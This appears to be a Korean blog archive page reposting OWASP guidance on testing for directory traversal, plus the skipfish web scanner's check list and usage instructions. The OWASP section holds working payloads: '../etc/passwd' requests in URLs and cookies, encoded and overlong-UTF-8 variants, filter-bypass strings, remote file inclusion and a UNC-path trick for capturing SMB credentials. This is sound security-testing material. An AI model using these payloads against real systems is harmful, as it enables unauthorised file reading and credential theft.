'Directory traversal'에 해당되는 글 2건

  1. 2010.06.01 Testing for Directory Traversal
  2. 2010.03.30 skipfish - web application security scanner
2010.06.01 15:01

Testing for Directory Traversal

Black Box testing and example

(a) Input Vectors Enumeration
In order to determine which part of the application is vulnerable to input validation bypassing, the tester needs to enumerate all parts of the application which accept content from the user. This also includes HTTP GET and POST queries and common options like file uploads and HTML forms.

Here are some examples of the checks to be performed at this stage:

  • Are there request parameters which could be used for file-related operations?
  • Are there unusual file extensions?
  • Are there interesting variable names?
http://example.com/getUserProfile.jsp?item=ikki.html
http://example.com/index.php?file=content
http://example.com/main.cgi?home=index.htm
  • Is it possible to identify cookies used by the web application for the dynamic generation of pages/templates?
Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower
Cookie: USER=1826cc8f:PSTYLE=GreenDotRed


(b) Testing Techniques

The next stage of testing is analyzing the input validation functions present in the web application.

Using the previous example, the dynamic page called getUserProfile.jsp loads static information from a file, showing the content to users. An attacker could insert the malicious string "../../../../etc/passwd" to include the password hash file of a Linux/Unix system. Obviously, this kind of attack is possible only if the validation checkpoint fails; according to the filesystem privileges, the web application itself must be able to read the file.

To successfully test for this flaw, the tester needs to have knowledge of the system being tested and the location of the files being requested. There is no point requesting /etc/passwd from an IIS web server.

http://example.com/getUserProfile.jsp?item=../../../../etc/passwd

For the cookies example, we have:

Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd

It's also possible to include files and scripts located on external website.

http://example.com/index.php?file=http://www.owasp.org/malicioustxt

The following example will demonstrate how it is possible to show the source code of a CGI component, without using any path traversal chars.

http://example.com/main.cgi?home=main.cgi

The component called "main.cgi" is located in the same directory as the normal HTML static files used by the application. In some cases the tester needs to encode the requests using special characters (like the "." dot, "%00" null, ...) in order to bypass file extension controls or to prevent script execution.

Tip It's a common mistake by developers to not expect every form of encoding and therefore only do validation for basic encoded content. If at first your test string isn't successful, try another encoding scheme.

Each operating system uses different chars as path separator:

Unix-like OS:

root directory: "/" 
directory separator: "/" 

Windows OS' Shell':

root directory: "<drive letter>:\"  
directory separator: "\" or "/" 
Greater and less than ">" and "<"
Double quotes (closed properly) 
– Extraneous current directory markers such as "./" or ".\" 
– Extraneous parent directory markers with arbitrary items that may or may not exist

Examples:

– file.txt 
– file.txt...
- file.txt...
– file.txt<spaces> 
– file.txt”””” 
–file.txt<<<>><>< 
– file.txt/./././
– nonexistant/../file.txt 

MAX_PATH of a filename can be exceeded by prefixing with \\?\ - but must be an absolute path, no parent or current directory indicators can be used, such as ./ or ../

"Windows API"

The following items are discarded:
periods
spaces

"Windows UNC Filenames"

Used to reference files on a SMB share. Sometimes, an application can be made to refer to files on a remote UNC filepath. If so, the Windows SMB server may send stored credentials to the attacker, which can be captured and cracked.

\\server_or_ip\path\to\file.abc
\\?\server_or_ip\path\to\file.abc

"Windows NT Device Namespace"

Used to refer to the Windows device namespace
\\.\GLOBALROOT\Device\HarddiskVolume1\   -equivalent to c:\
\\\airpcap00\ \\.\airpcap00\
\\.\CdRom0\

Usually, on Windows, the directory traversal attack is limited to a single partition

"DOS Special Devices"

\
CON - thee console 
PRN -  a parallel printer 
COM1 - the first serial port 
NUL -  bit bucket (/dev/null equivalent) 

Extensions are ignored. Ex:
- COM.bat
-CON.<666x"A">

Classic Mac OS:

root directory: "<drive letter>:" 
directory separator: ":" 


We should take in account the following chars encoding:

  • URL encoding and double URL encoding
%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../
%2e%2e%5c represents ..\
%2e%2e\ represents ..\
..%5c represents ..\
%252e%252e%255c represents ..\
..%255c represents ..\ and so on.
  • Unicode/UTF-8 Encoding (it only works in systems that are able to accept overlong UTF-8 sequences)
..%c0%af represents ../
..%c1%9c represents ..\


Gray Box testing and example

When the analysis is performed with a Gray Box approach, we have to follow the same methodology as in Black Box Testing. However, since we can review the source code, it is possible to search the input vectors (stage (a) of the testing) more easily and accurately. During a source code review, we can use simple tools (such as the grep command) to search for one or more common patterns within the application code: inclusion functions/methods, filesystem operations, and so on.

PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ... 
JSP/Servlet: java.io.File(), java.io.FileReader(), ...
ASP: include file, include virtual, ...

Using online code search engines (e.g., Google CodeSearch, Koders), it may also be possible to find path traversal flaws in OpenSource software published on the Internet.

For PHP, we can use:

lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)


Using the Gray Box Testing method, it is possible to discover vulnerabilities that are usually harder to discover, or even impossible to find during a standard Black Box assessment.

Some web applications generate dynamic pages using values and parameters stored in a database. It may be possible to insert specially crafted path traversal strings when the application adds data to the database. This kind of security problem is difficult to discover due to the fact the parameters inside the inclusion functions seem internal and "safe", but otherwise they are not.

Additionally, reviewing the source code, it is possible to analyze the functions that are supposed to handle invalid input: some developers try to change invalid input to make it valid, avoiding warnings and errors. These functions are usually prone to security flaws.

Consider a web application with these instructions:

filename = Request.QueryString(“file”); 
Replace(filename, “/”,”\”); 
Replace(filename, “..\”,””);

Testing for the flaw is achieved by:

file=....//....//boot.ini 
file=....\\....\\boot.ini 
file= ..\..\boot.ini 


출처 : www.owasp.org


Trackback 1 Comment 0
2010.03.30 11:12

skipfish - web application security scanner

A rough list of the security checks offered by the tool is outlined below.
  • High risk flaws (potentially leading to system compromise):

    • Server-side SQL injection (including blind vectors, numerical parameters).
    • Explicit SQL-like syntax in GET or POST parameters.
    • Server-side shell command injection (including blind vectors).
    • Server-side XML / XPath injection (including blind vectors).
    • Format string vulnerabilities.
    • Integer overflow vulnerabilities.
    • Locations accepting HTTP PUT.
  • Medium risk flaws (potentially leading to data compromise):

    • Stored and reflected XSS vectors in document body (minimal JS XSS support present).
    • Stored and reflected XSS vectors via HTTP redirects.
    • Stored and reflected XSS vectors via HTTP header splitting.
    • Directory traversal (including constrained vectors).
    • Assorted file POIs (server-side sources, configs, etc).
    • Attacker-supplied script and CSS inclusion vectors (stored and reflected).
    • External untrusted script and CSS inclusion vectors.
    • Mixed content problems on script and CSS resources (optional).
    • Incorrect or missing MIME types on renderables.
    • Generic MIME types on renderables.
    • Incorrect or missing charsets on renderables.
    • Conflicting MIME / charset info on renderables.
    • Bad caching directives on cookie setting responses.
  • Low risk issues (limited impact or low specificity):

    • Directory listing bypass vectors.
    • Redirection to attacker-supplied URLs (stored and reflected).
    • Attacker-supplied embedded content (stored and reflected).
    • External untrusted embedded content.
    • Mixed content on non-scriptable subresources (optional).
    • HTTP credentials in URLs.
    • Expired or not-yet-valid SSL certificates.
    • HTML forms with no XSRF protection.
    • Self-signed SSL certificates.
    • SSL certificate host name mismatches.
    • Bad caching directives on less sensitive content.
  • Internal warnings:

    • Failed resource fetch attempts.
    • Exceeded crawl limits.
    • Failed 404 behavior checks.
    • IPS filtering detected.
    • Unexpected response variations.
    • Seemingly misclassified crawl nodes.
  • Non-specific informational entries:

    • General SSL certificate information.
    • Significantly changing HTTP cookies.
    • Changing Server, Via, or X-... headers.
    • New 404 signatures.
    • Resources that cannot be accessed.
    • Resources requiring HTTP authentication.
    • Broken links.
    • Server errors.
    • All external links not classified otherwise (optional).
    • All external e-mails (optional).
    • All external URL redirectors (optional).
    • Links to unknown protocols.
    • Form fields that could not be autocompleted.
    • Password entry forms (for external brute-force).
    • File upload forms.
    • Other HTML forms (not classified otherwise).
    • Numerical file names (for external brute-force).
    • User-supplied links otherwise rendered on a page.
    • Incorrect or missing MIME type on less significant content.
    • Generic MIME type on less significant content.
    • Incorrect or missing charset on less significant content.
    • Conflicting MIME / charset information on less significant content.
    • OGNL-like parameter passing conventions.

Along with a list of identified issues, skipfish also provides summary overviews of document types and issue types found; and an interactive sitemap, with nodes discovered through brute-force denoted in a distinctive way.

How to run the scanner?

Once you have the dictionary selected, you can try:

$ ./skipfish -o output_dir http://www.example.com/some/starting/path.txt

Note that you can provide more than one starting URL if so desired; all of them will be crawled.

Some sites may require authentication; for simple HTTP credentials, you can try:

$ ./skipfish -A user:pass ...other parameters...

Alternatively, if the site relies on HTTP cookies instead, log in in your browser or using a simple curl script, and then provide skipfish with a session cookie:

$ ./skipfish -C name=val ...other parameters...

Other session cookies may be passed the same way, one per each -C option.

Certain URLs on the site may log out your session; you can combat this in two ways: by using the -N option, which causes the scanner to reject attempts to set or delete cookies; or with the -X parameter, which prevents matching URLs from being fetched:

$ ./skipfish -X /logout/logout.aspx ...other parameters...

The -X option is also useful for speeding up your scans by excluding /icons/, /doc/, /manuals/, and other standard, mundane locations along these lines. In general, you can use -X, plus -I (only spider URLs matching a substring) and -S (ignore links on pages where a substring appears in response body) to limit the scope of a scan any way you like - including restricting it only to a specific protocol and port:

$ ./skipfish -I http://example.com:1234/ ...other parameters...

Another useful scoping option is -D - allowing you to specify additional hosts or domains to consider in-scope for the test. By default, all hosts appearing in the command-line URLs are added to the list - but you can use -D to broaden these rules, for example:

$ ./skipfish -D test2.example.com -o output-dir http://test1.example.com/

...or, for a domain wildcard match, use:

$ ./skipfish -D .example.com -o output-dir http://test1.example.com/

In some cases, you do not want to actually crawl a third-party domain, but you trust the owner of that domain enough not to worry about cross-domain content inclusion from that location. To suppress warnings, you can use the -B option, for example:

$ ./skipfish -B .google-analytics.com -B .googleapis.com ...other parameters...

By default, skipfish sends minimalistic HTTP headers to reduce the amount of data exchanged over the wire; some sites examine User-Agent strings or header ordering to reject unsupported clients, however. In such a case, you can use -b ie or -b ffox to mimic one of the two popular browsers.

But seriously, how to run it?

A standard, authenticated scan of a well-designed and self-contained site (warns about all external links, e-mails, mixed content, and caching header issues):

$ ./skipfish -MEU -C "AuthCookie=value" -X /logout.aspx -o output_dir http://www.example.com/

Five-connection crawl, but no brute-force; pretending to be MSIE and caring less about ambiguous MIME or character set mismatches:

$ ./skipfish -m 5 -LVJ -W /dev/null -o output_dir -b ie http://www.example.com/

Brute force only (no HTML link extraction), trusting links within example.com and timing out after 5 seconds:

$ ./skipfish -B .example.com -O -o output_dir -t 5 http://www.example.com/

For a short list of all command-line options, try ./skipfish -h.

Oy! Something went horribly wrong!

There is no web crawler so good that there wouldn't be a web framework to one day set it on fire. If you encounter what appears to be bad behavior (e.g., a scan that takes forever and generates too many requests, completely bogus nodes in scan output, or outright crashes), please first check our known issues page. If you can't find a satisfactory answer there, recompile the scanner with:

$ make clean debug

...and re-run it this way:

$ ./skipfish [...previous options...] 2>logfile.txt

You can then inspect logfile.txt to get an idea what went wrong; if it looks like a scanner problem, please scrub any sensitive information from the log file and send it to the author.

If the scanner crashed, please recompile it as indicated above, and then type:

$ ulimit -c unlimited 
$ ./skipfish [...previous options...] 2>logfile.txt 
$ gdb --batch -ex back ./skipfish core

...and be sure to send the author the output of that last command as well.


원문 : http://code.google.com/p/skipfish/


Trackback 0 Comment 0